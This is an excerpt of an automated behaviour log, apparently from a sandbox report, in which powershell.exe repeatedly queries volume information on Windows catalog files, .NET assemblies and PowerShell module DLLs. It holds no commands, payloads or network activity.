Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
